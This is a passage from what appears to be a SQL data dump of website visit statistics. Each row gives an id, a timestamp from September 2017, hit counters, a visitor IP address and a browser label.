0,'217.182.132.31','other'),(153177,1504752027,1,1,0,0,'8.29.198.27','other'),(153178,1504752324,1,1,0,0,'46.223.113.216','chrome'),(153179,1504752454,1,1,0,0,'217.182.132.91','other'),(153180,1504752574,1,1,0,0,'217.182.132.187','other'),(153181,1504752652,1,0,1,0,'66.249.76.108',''),(153182,1504753326,2,2,0,0,'91.209.11.236','other'),(153183,1504753726,1,1,0,0,'217.182.132.61','other'),(153184,1504754393,1,1,0,0,'51.255.71.126','other'),(153185,1504754457,1,1,0,0,'157.55.39.211','other'),(153186,1504754972,1,1,0,0,'51.255.65.38','other'),(153187,1504754993,1,1,0,0,'51.255.65.18','other'),(153188,1504756167,3,3,0,0,'91.209.11.236','other'),(153189,1504756427,1,0,1,0,'66.249.66.157',''),(153190,1504756716,1,1,0,0,'141.8.142.21','other'),(153191,1504756864,1,1,0,0,'217.182.132.37','other'),(153192,1504756882,1,1,0,0,'66.249.76.93','chrome'),(153193,1504756892,1,0,1,0,'66.249.66.74',''),(153194,1504756897,1,1,0,0,'66.249.76.108','chrome'),(153195,1504757387,1,1,0,0,'51.255.65.37','other'),(153196,1504757676,1,1,0,0,'51.255.65.90','other'),(153197,1504758492,1,1,0,0,'46.161.9.39','chrome'),(153198,1504758497,1,0,1,0,'66.249.76.91',''),(153199,1504758644,1,1,0,0,'5.45.207.64','other'),(153200,1504758943,1,1,0,0,'217.182.132.148','other'),(153201,1504759245,1,1,0,0,'217.182.132.56','other'),(153202,1504760116,1,1,0,0,'217.182.132.31','other'),(153203,1504760213,1,0,1,0,'66.249.76.93',''),(153204,1504760327,1,1,0,0,'95.132.30.210','firefox'),(153205,1504760603,1,1,0,0,'217.182.132.17','other'),(153206,1504760642,8,8,0,0,'167.114.219.41','other'),(153207,1504760677,1,1,0,0,'217.182.132.185','other'),(153208,1504760768,1,0,1,0,'66.249.66.156',''),(153209,1504760984,1,1,0,0,'217.182.132.5','other'),(153210,1504761338,1,1,0,0,'91.196.178.65','firefox'),(153211,1504761757,1,1,0,0,'217.182.132.72','other'),(153212,1504762012,1,1,0,0,'46.219.96.18','chrome'),(153213,1504762176,1,1,0,0,'51.255.65.81','other'),(153214,1504762187,1,1,0,0,'212.33.255.53','other'),(153215,1504762188,1,1,0,0,'212.33.255.53','msie'),(153216,1504762389,1,1,0,0,'217.182.132.58','other'),(153217,1504762543,1,1,0,0,'91.196.178.71','chrome'),(153218,1504762862,1,1,0,0,'8.29.198.26','other'),(153219,1504763371,1,1,0,0,'66.249.76.93','chrome'),(153220,1504763376,1,1,0,0,'66.249.76.107','chrome'),(153221,1504763528,1,0,1,0,'66.249.76.108',''),(153222,1504763731,1,1,0,0,'217.182.132.69','other'),(153223,1504763831,1,1,0,0,'217.182.132.193','other'),(153224,1504763958,1,1,0,0,'66.102.9.61','chrome'),(153225,1504764289,1,1,0,0,'51.255.65.17','other'),(153226,1504765138,1,1,0,0,'51.255.65.49','other'),(153227,1504765350,1,1,0,0,'180.76.15.155','other'),(153228,1504765423,1,1,0,0,'51.255.71.128','other'),(153229,1504765779,1,1,0,0,'5.167.223.8','chrome'),(153230,1504765933,5,5,0,0,'46.229.168.75','other'),(153231,1504765951,2,2,0,0,'46.229.168.73','other'),(153232,1504765988,6,6,0,0,'46.229.168.68','other'),(153233,1504766023,6,6,0,0,'46.229.168.71','other'),(153234,1504766095,4,4,0,0,'46.229.168.72','other'),(153235,1504766149,5,5,0,0,'46.229.168.69','other'),(153236,1504766168,6,6,0,0,'46.229.168.80','other'),(153237,1504766230,5,5,0,0,'46.229.168.66','other'),(153238,1504766270,7,7,0,0,'46.229.168.76','other'),(153239,1504766283,1,1,0,0,'46.229.168.78','other'),(153240,1504766294,4,4,0,0,'46.229.168.70','other'),(153241,1504766385,5,5,0,0,'46.229.168.67','other'),(153242,1504766402,4,4,0,0,'46.229.168.79','other'),(153243,1504766462,1,1,0,0,'46.229.168.77','other'),(153244,1504766834,3,3,0,0,'46.229.168.75','other'),(153245,1504766888,5,5,0,0,'46.229.168.74','other'),(153246,1504766961,4,4,0,0,'46.229.168.65','other'),(153247,1504766967,1,1,0,0,'180.76.15.156','other'),(153248,1504767141,6,6,0,0,'46.229.168.71','other'),(153249,1504767195,4,4,0,0,'46.229.168.73','other'),(153250,1504767213,3,3,0,0,'46.229.168.70','other'),(153251,1504767231,6,6,0,0,'46.229.168.72','other'),(153252,1504767249,4,4,0,0,'46.229.168.69','other'),(153253,1504767321,3,3,0,0,'46.229.168.76','other'),(153254,1504767357,4,4,0,0,'46.229.168.68','other'),(153255,1504767411,6,6,0,0,'46.229.168.79','other'),(153256,1504767429,5,5,0,0,'46.229.168.67','other'),(153257,1504767460,6,6,0,0,'46.229.168.66','other'),(153258,1504767510,1,1,0,0,'46.229.168.77','other'),(153259,1504767621,1,1,0,0,'217.182.132.187','other'),(153260,1504767655,3,3,0,0,'46.229.168.80','other'),(153261,1504767765,1,1,0,0,'91.195.156.46','chrome'),(153262,1504767861,4,4,0,0,'46.229.168.75','other'),(153263,1504767897,4,4,0,0,'46.229.168.74','other'),(153264,1504767934,4,4,0,0,'46.229.168.65','other'),(153265,1504768078,4,4,0,0,'46.229.168.71','other'),(153266,1504768168,1,1,0,0,'46.229.168.69','other'),(153267,1504768222,3,3,0,0,'46.229.168.73','other'),(153268,1504768276,8,8,0,0,'46.229.168.76','other'),(153269,1504768315,1,1,0,0,'217.182.132.57','other'),(153270,1504768330,5,5,0,0,'46.229.168.70','other'),(153271,1504768337,1,0,1,0,'66.249.66.75',''),(153272,1504768361,3,3,0,0,'46.229.168.72','other'),(153273,1504768446,7,7,0,0,'46.229.168.66','other'),(153274,1504768456,3,3,0,0,'46.229.168.79','other'),(153275,1504768506,1,1,0,0,'66.249.76.107','chrome'),(153276,1504768512,1,1,0,0,'66.249.76.89','chrome'),(153277,1504768582,2,2,0,0,'46.229.168.68','other'),(153278,1504768601,3,3,0,0,'46.229.168.80','other'),(153279,1504768649,6,6,0,0,'46.229.168.77','other'),(153280,1504768788,3,3,0,0,'46.229.168.78','other'),(153281,1504768800,1,1,0,0,'217.182.132.33','other'),(153282,1504768871,3,3,0,0,'46.229.168.75','other'),(153283,1504768895,1,1,0,0,'51.255.65.61','other'),(153284,1504768985,6,6,0,0,'46.4.32.75','other'),(153285,1504769054,1,1,0,0,'94.178.23.45','chrome'),(153286,1504769272,1,1,0,0,'157.55.39.42','other'),(153287,1504769952,1,1,0,0,'217.69.133.203','other'),(153288,1504771180,1,1,0,0,'217.182.132.183','other'),(153289,1504771235,1,1,0,0,'217.182.132.97','other'),(153290,1504771384,1,1,0,0,'81.1.242.33','other'),(153291,1504771405,1,1,0,0,'212.90.60.61','firefox'),(153292,1504771446,1,1,0,0,'178.92.215.152','chrome'),(153293,1504771831,2,2,0,0,'91.209.11.236','other'),(153294,1504771853,1,1,0,0,'217.182.132.91','other'),(153295,1504771903,7,7,0,0,'195.154.146.17','other'),(153296,1504772062,1,1,0,0,'91.196.178.70','chrome'),(153297,1504772184,1,1,0,0,'217.182.132.147','other'),(153298,1504772884,1,1,0,0,'217.182.132.151','other'),(153299,1504773349,1,1,0,0,'51.255.65.58','other'),(153300,1504773487,1,1,0,0,'91.196.178.70','chrome'),(153301,1504773681,1,1,0,0,'137.74.207.114','other'),(153302,1504773693,1,1,0,0,'8.29.198.25','other'),(153303,1504773770,1,1,0,0,'51.255.65.66','other'),(153304,1504773853,1,1,0,0,'37.229.204.176','chrome'),(153305,1504774085,1,1,0,0,'66.249.66.157','chrome'),(153306,1504774090,1,1,0,0,'66.249.66.75','chrome'),(153307,1504774323,1,1,0,0,'217.182.132.27','other'),(153308,1504774430,1,1,0,0,'51.255.65.81','other'),(153309,1504774706,1,1,0,0,'51.255.65.62','other'),(153310,1504775158,1,1,0,0,'91.124.138.92','chrome'),(153311,1504775452,1,1,0,0,'51.255.65.51','other'),(153312,1504776039,1,1,0,0,'51.255.71.129','other'),(153313,1504776367,1,1,0,0,'217.69.133.9','other'),(153314,1504776974,1,1,0,0,'91.209.11.236','other'),(153315,1504777066,1,1,0,0,'82.207.91.234','other'),(153316,1504777668,1,1,0,0,'137.74.207.161','other'),(153317,1504777745,1,1,0,0,'87.250.224.54','other'),(153318,1504777749,1,1,0,0,'87.250.224.75','other'),(153319,1504778155,1,1,0,0,'95.108.181.58','other'),(153320,1504778249,1,1,0,0,'137.74.207.119','other'),(153321,1504778276,1,1,0,0,'151.80.27.118','other'),(153322,1504778392,1,0,1,0,'66.249.76.108',''),(153323,1504778816,1,1,0,0,'91.196.178.66','chrome'),(153324,1504779029,1,1,0,0,'137.74.207.108','other'),(153325,1504779320,1,1,0,0,'137.74.203.194','other'),(153326,1504779523,1,1,0,0,'217.182.132.58','other'),(153327,1504779680,1,1,0,0,'217.182.132.75','other'),(153328,1504779884,2,2,0,0,'162.210.196.130','other'),(153329,1504779885,1,1,0,0,'51.255.65.63','other'),(153330,1504780240,1,1,0,0,'217.182.132.35','other'),(153331,1504780534,1,1,0,0,'91.209.11.236','other'),(153332,1504781120,1,1,0,0,'91.196.178.167','chrome'),(153333,1504781493,1,1,0,0,'217.182.132.29','other'),(153334,1504784307,1,1,0,0,'91.196.178.164','chrome'),(153335,1504784495,1,1,0,0,'217.182.132.185','other'),(153336,1504784551,1,1,0,0,'8.29.198.27','other'),(153337,1504784720,1,1,0,0,'91.196.178.65','firefox'),(153338,1504785051,1,1,0,0,'137.74.207.101','other'),(153339,1504785220,1,1,0,0,'91.196.178.65','chrome'),(153340,1504785316,1,1,0,0,'81.1.242.33','other'),(153341,1504785420,1,1,0,0,'51.255.65.47','other'),(153342,1504785609,1,0,1,0,'66.249.66.76',''),(153343,1504785631,1,1,0,0,'164.132.162.159','other'),(153344,1504785690,1,1,0,0,'66.249.66.157','chrome'),(153345,1504785698,1,1,0,0,'66.249.66.74','chrome'),(153346,1504785708,1,1,0,0,'217.182.132.179','other'),(153347,1504785753,1,1,0,0,'51.255.65.65','other'),(153348,1504786078,1,1,0,0,'185.100.84.82','chrome'),(153349,1504786121,1,1,0,0,'51.255.71.98','other'),(153350,1504786247,1,1,0,0,'95.132.12.160','firefox'),(153351,1504786428,1,1,0,0,'51.255.71.119','other'),(153352,1504787033,1,1,0,0,'51.255.65.76','other'),(153353,1504787201,1,1,0,0,'51.255.71.113','other'),(153354,1504787315,1,1,0,0,'51.255.65.8','other'),(153355,1504787357,1,1,0,0,'217.182.132.95','other'),(153356,1504787421,1,1,0,0,'164.132.164.180','other'),(153357,1504787705,1,1,0,0,'51.255.65.50','other'),(153358,1504787882,1,1,0,0,'180.76.15.28','other'),(153359,1504788078,1,1,0,0,'217.182.132.31','other'),(153360,1504788881,1,1,0,0,'51.255.65.16','other'),(153361,1504788950,1,0,1,0,'66.249.76.89',''),(153362,1504789112,1,0,1,0,'66.249.76.109',''),(153363,1504789374,1,1,0,0,'217.182.132.71','other'),(153364,1504789657,1,1,0,0,'91.220.61.188','firefox'),(153365,1504789720,1,1,0,0,'217.182.132.67','other'),(153366,1504789762,1,1,0,0,'164.132.162.158','other'),(153367,1504789917,1,1,0,0,'5.45.207.64','other'),(153368,1504790036,1,0,1,0,'66.249.76.107',''),(153369,1504790216,1,1,0,0,'217.182.132.180','other'),(153370,1504790325,1,1,0,0,'51.255.65.29','other'),(153371,1504790326,1,1,0,0,'91.196.178.167','chrome'),(153372,1504790594,1,1,0,0,'51.255.65.69','other'),(153373,1504790811,1,1,0,0,'212.26.134.106','chrome'),(153374,1504791009,2,2,0,0,'37.55.151.144','firefox'),(153375,1504791265,1,1,0,0,'51.255.65.56','other'),(153376,1504791551,1,1,0,0,'91.196.178.167','chrome'),(153377,1504791907,1,1,0,0,'207.154.239.93','other'),(153378,1504792038,1,1,0,0,'91.196.178.65','firefox'),(153379,1504792072,1,1,0,0,'51.255.65.16','other'),(153380,1504792783,1,1,0,0,'194.187.218.50','chrome'),(153381,1504793042,1,1,0,0,'91.196.178.167','chrome'),(153382,1504793115,1,1,0,0,'91.196.178.169','chrome'),(153383,1504793270,1,1,0,0,'217.182.132.19','other'),(153384,1504793293,1,1,0,0,'51.255.65.36','other'),(153385,1504793482,1,1,0,0,'217.182.132.6','other'),(153386,1504793617,1,1,0,0,'51.255.65.59','other'),(153387,1504793827,1,1,0,0,'51.255.65.54','other'),(153388,1504794150,1,1,0,0,'66.249.66.155','chrome'),(153389,1504794264,1,1,0,0,'185.8.107.159','chrome'),(153390,1504794434,1,1,0,0,'51.255.65.66','other'),(153391,1504794812,1,1,0,0,'217.182.132.155','other'),(153392,1504794919,1,1,0,0,'51.255.65.4','other'),(153393,1504795204,1,1,0,0,'217.182.132.85','other'),(153394,1504795206,1,1,0,0,'91.196.178.65','chrome'),(153395,1504795384,1,1,0,0,'8.29.198.26','other'),(153396,1504795545,2,2,0,0,'37.54.16.18','chrome'),(153397,1504795614,1,1,0,0,'51.255.65.58','other'),(153398,1504795747,2,2,0,0,'141.8.183.1','other'),(153399,1504795852,1,1,0,0,'51.255.65.25','other'),(153400,1504796083,1,1,0,0,'141.8.142.21','other'),(153401,1504796615,1,1,0,0,'217.182.132.36','other'),(153402,1504796685,1,1,0,0,'66.249.76.109','chrome'),(153403,1504797346,1,1,0,0,'217.182.132.85','other'),(153404,1504797653,1,1,0,0,'212.1.72.74','chrome'),(153405,1504797860,1,1,0,0,'91.209.11.236','other'),(153406,1504798155,1,1,0,0,'180.76.15.148','other'),(153407,1504798333,1,1,0,0,'130.180.212.112','chrome'),(153408,1504798639,1,0,1,0,'66.249.76.108',''),(153409,1504799722,1,1,0,0,'46.211.144.158','chrome'),(153410,1504799826,1,1,0,0,'51.255.65.90','other'),(153411,1504799868,1,1,0,0,'91.209.11.236','other'),(153412,1504799962,11,11,0,0,'192.99.203.35','other'),(153413,1504800192,1,1,0,0,'51.255.65.17','other'),(153414,1504800385,1,1,0,0,'37.73.141.104','chrome'),(153415,1504800574,1,1,0,0,'66.249.76.93','chrome'),(153416,1504800720,1,1,0,0,'137.74.201.108','other'),(153417,1504802413,1,1,0,0,'46.219.6.26','chrome'),(153418,1504803046,1,1,0,0,'217.182.132.171','other'),(153419,1504803113,1,1,0,0,'37.54.16.251','chrome'),(153420,1504803363,1,1,0,0,'51.255.65.3','other'),(153421,1504803512,1,1,0,0,'217.182.132.50','other'),(153422,1504803743,1,0,1,0,'66.249.66.76',''),(153423,1504804125,1,1,0,0,'51.255.65.7','other'),(153424,1504804531,1,1,0,0,'91.196.178.36','chrome'),(153425,1504804611,4,4,0,0,'141.8.183.1','other'),(153426,1504804951,1,1,0,0,'178.95.246.77','chrome'),(153427,1504805030,1,1,0,0,'91.196.178.130','chrome'),(153428,1504805057,1,1,0,0,'91.196.178.133','chrome'),(153429,1504805092,1,1,0,0,'188.166.94.121','chrome'),(153430,1504805125,1,1,0,0,'51.255.65.96','other'),(153431,1504805163,1,1,0,0,'188.231.214.81','chrome'),(153432,1504805184,1,1,0,0,'91.196.178.165','chrome'),(153433,1504805242,1,1,0,0,'138.246.2.136','chrome'),(153434,1504805272,1,1,0,0,'91.196.178.168','chrome'),(153435,1504805333,1,1,0,0,'91.209.11.236','other'),(153436,1504805339,3,3,0,0,'5.45.207.64','other'),(153437,1504805361,1,1,0,0,'93.72.4.209','chrome'),(153438,1504805369,1,1,0,0,'91.196.178.66','chrome'),(153439,1504805380,1,1,0,0,'91.196.178.161','chrome'),(153440,1504805401,2,2,0,0,'91.196.178.131','chrome'),(153441,1504805463,1,1,0,0,'46.200.104.205','opera'),(153442,1504805475,1,1,0,0,'51.255.71.130','other'),(153443,1504805480,1,1,0,0,'46.211.3.196','chrome'),(153444,1504805510,2,2,0,0,'142.54.174.130','msie'),(153445,1504805514,1,1,0,0,'37.54.22.131','chrome'),(153446,1504805632,1,1,0,0,'91.196.178.162','chrome'),(153447,1504805702,1,1,0,0,'163.172.255.19','chrome'),(153448,1504805714,1,1,0,0,'78.111.187.138','chrome'),(153449,1504805726,1,1,0,0,'91.196.178.70','chrome'),(153450,1504805748,1,1,0,0,'137.74.203.194','other'),(153451,1504805755,1,1,0,0,'91.196.178.166','other'),(153452,1504805792,1,1,0,0,'37.73.204.34','chrome'),(153453,1504805875,1,1,0,0,'178.137.50.199','chrome'),(153454,1504805912,1,1,0,0,'91.196.178.132','chrome'),(153455,1504805973,3,3,0,0,'141.8.183.1','other'),(153456,1504805987,1,1,0,0,'91.196.178.167','chrome'),(153457,1504805996,1,1,0,0,'91.196.178.101','firefox'),(153458,1504806006,1,1,0,0,'46.211.65.194','chrome'),(153459,1504806031,1,1,0,0,'91.196.178.134','chrome'),(153460,1504806036,1,1,0,0,'92.112.125.96','chrome'),(153461,1504806216,1,1,0,0,'8.29.198.27','other'),(153462,1504806274,1,1,0,0,'95.134.117.125','chrome'),(153463,1504806278,1,1,0,0,'5.45.207.64','other'),(153464,1504806413,1,1,0,0,'37.190.163.241','chrome'),(153465,1504806430,1,1,0,0,'91.196.178.36','chrome'),(153466,1504806473,1,1,0,0,'91.196.178.68','chrome'),(153467,1504806649,1,1,0,0,'92.113.127.86','chrome'),(153468,1504806663,1,1,0,0,'46.200.104.205','opera'),(153469,1504806687,1,1,0,0,'93.143.13.51','chrome'),(153470,1504806688,2,2,0,0,'91.196.178.131','chrome'),(153471,1504806710,1,0,1,0,'66.249.66.156',''),(153472,1504806724,1,1,0,0,'185.137.17.67','chrome'),(153473,1504806741,1,1,0,0,'91.196.178.97','chrome'),(153474,1504806751,1,1,0,0,'137.74.207.119','other'),(153475,1504806779,1,1,0,0,'91.196.178.38','chrome'),(153476,1504806791,1,1,0,0,'107.167.109.164','chrome'),(153477,1504806798,1,1,0,0,'91.196.178.136','chrome'),(153478,1504806817,3,3,0,0,'91.209.11.236','other'),(153479,1504806842,1,1,0,0,'46.219.233.192','other'),(153480,1504806917,1,1,0,0,'91.196.178.98','chrome'),(153481,1504806923,1,1,0,0,'51.255.65.66','other'),(153482,1504806927,1,1,0,0,'93.72.80.181','chrome'),(153483,1504806943,1,1,0,0,'95.158.53.251','chrome'),(153484,1504806954,1,1,0,0,'46.201.174.65','chrome'),(153485,1504806974,1,1,0,0,'51.255.71.113','other'),(153486,1504807024,1,1,0,0,'91.196.178.166','other'),(153487,1504807038,1,1,0,0,'91.196.178.70','chrome'),(153488,1504807116,1,1,0,0,'92.113.175.45','chrome'),(153489,1504807201,1,1,0,0,'37.54.115.39','chrome'),(153490,1504807224,1,1,0,0,'91.196.178.37','chrome'),(153491,1504807268,1,1,0,0,'192.166.134.201','other'),(153492,1504807283,1,1,0,0,'80.243.101.239','chrome'),(153493,1504807348,2,2,0,0,'91.196.178.134','chrome'),(153494,1504807385,1,1,0,0,'37.53.227.157','chrome'),(153495,1504807393,1,1,0,0,'46.200.99.187','chrome'),(153496,1504807399,1,1,0,0,'95.132.117.127','chrome'),(153497,1504807460,1,1,0,0,'85.114.212.71','chrome'),(153498,1504807467,1,1,0,0,'91.196.178.33','firefox'),(153499,1504807520,1,1,0,0,'37.115.108.173','chrome'),(153500,1504807639,1,1,0,0,'91.196.178.66','firefox'),(153501,1504807667,1,1,0,0,'51.255.71.119','other'),(153502,1504807668,1,1,0,0,'216.244.66.237','other'),(153503,1504807745,1,1,0,0,'95.158.53.83','chrome'),(153504,1504807748,1,1,0,0,'91.196.178.101','chrome'),(153505,1504807779,1,1,0,0,'95.135.91.97','chrome'),(153506,1504807833,1,1,0,0,'37.73.201.114','chrome'),(153507,1504807873,1,1,0,0,'5.45.207.64','other'),(153508,1504807904,1,1,0,0,'37.53.228.198','chrome'),(153509,1504807905,2,2,0,0,'91.196.178.97','chrome'),(153510,1504807933,1,1,0,0,'91.196.178.101','firefox'),(153511,1504807935,1,1,0,0,'91.196.178.35','chrome'),(153512,1504807989,1,1,0,0,'66.102.9.22','chrome'),(153513,1504808018,2,2,0,0,'91.209.11.236','other'),(153514,1504808028,1,1,0,0,'37.54.16.4','chrome'),(153515,1504808035,1,1,0,0,'178.95.244.117','firefox'),(153516,1504808038,1,1,0,0,'95.134.117.230','chrome'),(153517,1504808051,1,1,0,0,'91.196.178.161','chrome'),(153518,1504808099,1,1,0,0,'51.255.65.49','other'),(153519,1504808235,3,3,0,0,'37.52.23.105','chrome'),(153520,1504808241,1,1,0,0,'94.178.107.118','chrome'),(153521,1504808332,1,1,0,0,'91.196.178.164','other'),(153522,1504808343,1,1,0,0,'37.58.52.81','chrome'),(153523,1504808360,1,1,0,0,'92.113.175.45','chrome'),(153524,1504808392,1,1,0,0,'95.132.107.5','chrome'),(153525,1504808394,1,1,0,0,'217.182.132.63','other'),(153526,1504808395,1,1,0,0,'164.132.162.187','other'),(153527,1504808398,1,1,0,0,'91.196.178.65','chrome'),(153528,1504808460,1,1,0,0,'91.196.178.70','other'),(153529,1504808520,2,2,0,0,'91.196.178.132','chrome'),(153530,1504808540,1,1,0,0,'91.196.178.33','chrome'),(153531,1504808704,1,1,0,0,'91.196.178.36','other'),(153532,1504808764,1,1,0,0,'92.113.156.4','chrome'),(153533,1504808830,1,1,0,0,'37.73.193.171','chrome'),(153534,1504808836,2,2,0,0,'91.196.178.136','chrome'),(153535,1504808848,1,1,0,0,'91.196.178.36','chrome'),(153536,1504808878,1,1,0,0,'107.167.108.91','other'),(153537,1504808909,1,1,0,0,'188.166.57.246','chrome'),(153538,1504809071,1,1,0,0,'46.174.125.128','chrome'),(153539,1504809115,1,1,0,0,'188.231.221.115','chrome'),(153540,1504809117,1,1,0,0,'213.169.72.130','chrome'),(153541,1504809138,1,1,0,0,'37.52.16.238','chrome'),(153542,1504809209,1,1,0,0,'91.196.178.98','firefox'),(153543,1504809220,1,1,0,0,'91.196.178.129','chrome'),(153544,1504809255,1,1,0,0,'91.224.178.77','chrome'),(153545,1504809268,1,1,0,0,'91.196.178.66','chrome'),(153546,1504809292,3,3,0,0,'91.196.178.161','chrome'),(153547,1504809307,1,1,0,0,'91.196.178.65','chrome'),(153548,1504809313,1,1,0,0,'107.167.108.91','opera'),(153549,1504809340,1,1,0,0,'51.255.65.39','other'),(153550,1504809384,1,1,0,0,'91.232.158.8','chrome'),(153551,1504809430,1,1,0,0,'91.196.178.97','chrome'),(153552,1504809445,2,2,0,0,'91.196.178.163','other'),(153553,1504809516,1,1,0,0,'91.196.178.132','opera'),(153554,1504809541,1,1,0,0,'95.132.54.70','chrome'),(153555,1504809591,1,1,0,0,'5.228.7.177','chrome'),(153556,1504809597,3,3,0,0,'91.209.11.236','other'),(153557,1504809654,1,1,0,0,'91.196.178.163','chrome'),(153558,1504809798,1,1,0,0,'91.196.178.39','chrome'),(153559,1504809816,1,1,0,0,'91.196.178.38','chrome'),(153560,1504809823,1,1,0,0,'91.196.178.99','opera'),(153561,1504809826,1,1,0,0,'5.45.207.32','other'),(153562,1504809837,1,1,0,0,'91.196.178.136','chrome'),(153563,1504809838,1,1,0,0,'93.91.150.23','chrome'),(153564,1504809885,1,1,0,0,'91.196.178.34','chrome'),(153565,1504809895,1,1,0,0,'91.196.178.135','chrome'),(153566,1504809903,1,1,0,0,'66.249.83.218','chrome'),(153567,1504809904,1,1,0,0,'66.249.83.221','chrome'),(153568,1504809940,1,1,0,0,'46.211.144.105','chrome'),(153569,1504809965,1,1,0,0,'78.111.185.157','chrome'),(153570,1504810028,1,1,0,0,'185.137.18.191','chrome'),(153571,1504810063,1,1,0,0,'46.211.127.104','chrome'),(153572,1504810279,2,2,0,0,'91.196.178.133','chrome'),(153573,1504810354,1,1,0,0,'130.180.218.187','chrome'),(153574,1504810377,1,1,0,0,'107.167.106.119','other'),(153575,1504810466,1,1,0,0,'193.164.95.11','chrome'),(153576,1504810492,1,1,0,0,'107.167.109.127','other'),(153577,1504810545,1,1,0,0,'95.134.97.25','chrome'),(153578,1504810572,1,1,0,0,'91.196.178.163','chrome'),(153579,1504810607,1,0,1,0,'66.249.66.157',''),(153580,1504810659,1,1,0,0,'91.196.178.166','chrome'),(153581,1504810671,1,1,0,0,'51.255.65.7','other'),(153582,1504810710,1,1,0,0,'107.167.109.92','chrome'),(153583,1504810759,1,1,0,0,'217.182.132.177','other'),(153584,1504810765,1,1,0,0,'91.196.178.66','chrome'),(153585,1504810796,1,1,0,0,'217.182.132.76','other'),(153586,1504810801,1,1,0,0,'130.180.210.245','firefox'),(153587,1504810834,1,1,0,0,'95.132.48.232','chrome'),(153588,1504810863,1,1,0,0,'5.45.207.32','other'),(153589,1504810883,1,1,0,0,'91.196.178.65','chrome'),(153590,1504810886,1,1,0,0,'217.182.132.179','other'),(153591,1504811054,1,1,0,0,'91.196.178.135','chrome'),(153592,1504811062,1,1,0,0,'46.211.102.157','chrome'),(153593,1504811151,2,2,0,0,'91.196.178.136','chrome'),(153594,1504811267,2,2,0,0,'91.196.178.72','chrome'),(153595,1504811277,2,2,0,0,'107.167.107.174','other'),(153596,1504811389,1,1,0,0,'37.73.208.45','chrome'),(153597,1504811434,1,1,0,0,'193.164.95.11','chrome'),(153598,1504811517,1,1,0,0,'91.196.178.40','chrome'),(153599,1504811538,1,1,0,0,'185.137.18.191','chrome'),(153600,1504811595,1,1,0,0,'95.132.30.210','firefox'),(153601,1504811626,1,1,0,0,'217.182.132.240','other'),(153602,1504811637,1,1,0,0,'95.134.185.219','chrome'),(153603,1504811671,1,1,0,0,'95.132.35.108','chrome'),(153604,1504811730,1,1,0,0,'178.92.251.64','chrome'),(153605,1504811741,1,1,0,0,'217.182.132.84','other'),(153606,1504811752,1,1,0,0,'91.196.178.98','chrome'),(153607,1504811932,2,2,0,0,'91.196.178.34','chrome'),(153608,1504811947,2,2,0,0,'91.196.178.103','chrome'),(153609,1504811954,1,1,0,0,'66.102.9.24','chrome'),(153610,1504812056,1,1,0,0,'91.196.178.164','chrome'),(153611,1504812098,1,1,0,0,'46.133.176.31','chrome'),(153612,1504812113,1,1,0,0,'91.196.178.168','chrome'),(153613,1504812296,1,1,0,0,'91.196.178.66','chrome'),(153614,1504812350,1,1,0,0,'37.53.224.234','chrome'),(153615,1504812355,1,1,0,0,'91.196.178.165','firefox'),(153616,1504812360,1,1,0,0,'37.55.56.99','chrome'),(153617,1504812382,1,1,0,0,'91.196.178.136','chrome'),(153618,1504812384,1,1,0,0,'130.180.217.226','chrome'),(153619,1504812409,1,1,0,0,'128.199.164.215','chrome'),(153620,1504812446,1,1,0,0,'78.111.190.204','chrome'),(153621,1504812490,1,1,0,0,'91.196.178.68','opera'),(153622,1504812506,1,1,0,0,'163.172.255.19','chrome'),(153623,1504812533,1,1,0,0,'87.250.224.150','other'),(153624,1504812535,2,2,0,0,'5.45.207.64','other'),(153625,1504812543,1,1,0,0,'91.196.178.65','chrome'),(153626,1504812554,2,2,0,0,'141.8.183.1','other'),(153628,1504812563,1,1,0,0,'46.133.38.184','other'),(153629,1504812595,1,1,0,0,'91.196.178.130','chrome'),(153630,1504812599,1,1,0,0,'92.113.175.64','chrome'),(153631,1504812752,1,1,0,0,'46.133.191.146','chrome'),(153632,1504812756,1,1,0,0,'107.167.109.56','opera'),(153633,1504812861,1,1,0,0,'78.111.185.157','chrome'),(153634,1504812934,1,1,0,0,'207.154.219.157','chrome'),(153635,1504812996,1,1,0,0,'37.73.214.15','chrome'),(153636,1504813046,1,1,0,0,'91.196.178.167','chrome'),(153637,1504813057,1,1,0,0,'37.73.247.145','chrome'),(153638,1504813085,1,1,0,0,'217.182.132.25','other'),(153639,1504813089,1,1,0,0,'91.196.178.104','chrome'),(153640,1504813101,2,2,0,0,'91.196.178.131','chrome'),(153641,1504813158,1,1,0,0,'91.196.178.136','other'),(153642,1504813266,1,1,0,0,'217.182.132.37','other'),(153643,1504813273,1,1,0,0,'91.196.178.37','firefox'),(153644,1504813474,1,1,0,0,'46.211.102.156','other'),(153645,1504813480,1,1,0,0,'188.163.18.9','chrome'),(153646,1504813482,1,1,0,0,'217.182.132.153','other'),(153647,1504813531,1,1,0,0,'91.196.178.130','chrome'),(153648,1504813618,1,1,0,0,'92.113.175.64','chrome'),(153649,1504813796,1,1,0,0,'130.180.219.147','chrome'),(153650,1504813849,1,1,0,0,'5.45.207.64','other'),(153651,1504813865,1,1,0,0,'107.167.106.156','other'),(153652,1504813910,1,1,0,0,'37.73.229.207','other'),(153653,1504813928,1,1,0,0,'91.196.178.98','chrome'),(153654,1504813981,1,1,0,0,'95.134.168.26','chrome'),(153655,1504814042,1,1,0,0,'91.196.178.134','chrome'),(153656,1504814043,1,1,0,0,'91.196.178.70','chrome'),(153657,1504814076,1,1,0,0,'51.255.65.17','other'),(153658,1504814235,1,1,0,0,'51.255.65.87','other'),(153659,1504814250,1,1,0,0,'91.196.178.131','chrome'),(153660,1504814411,1,1,0,0,'95.132.82.163','chrome'),(153661,1504814526,1,1,0,0,'91.196.178.35','chrome'),(153662,1504814605,1,1,0,0,'46.200.124.128','chrome'),(153663,1504814647,1,1,0,0,'51.255.65.70','other'),(153664,1504814768,1,1,0,0,'176.36.32.9','chrome'),(153665,1504814828,1,1,0,0,'107.167.109.155','opera'),(153666,1504815001,1,1,0,0,'107.167.106.156','opera'),(153667,1504815005,1,1,0,0,'130.180.218.241','firefox'),(153668,1504815095,1,1,0,0,'37.53.224.216','firefox'),(153669,1504815107,1,1,0,0,'178.95.156.215','chrome'),(153670,1504815113,1,1,0,0,'217.182.132.50','other'),(153671,1504815140,1,1,0,0,'46.101.221.204','chrome'),(153672,1504815227,1,1,0,0,'185.137.18.191','chrome'),(153673,1504815274,1,1,0,0,'178.92.248.31','chrome'),(153674,1504815276,1,1,0,0,'91.196.178.40','chrome'),(153675,1504815285,1,1,0,0,'51.255.65.35','other'),(153676,1504815291,1,1,0,0,'217.182.132.15','other'),(153677,1504815362,1,1,0,0,'176.101.201.173','chrome'),(153678,1504815504,2,2,0,0,'91.196.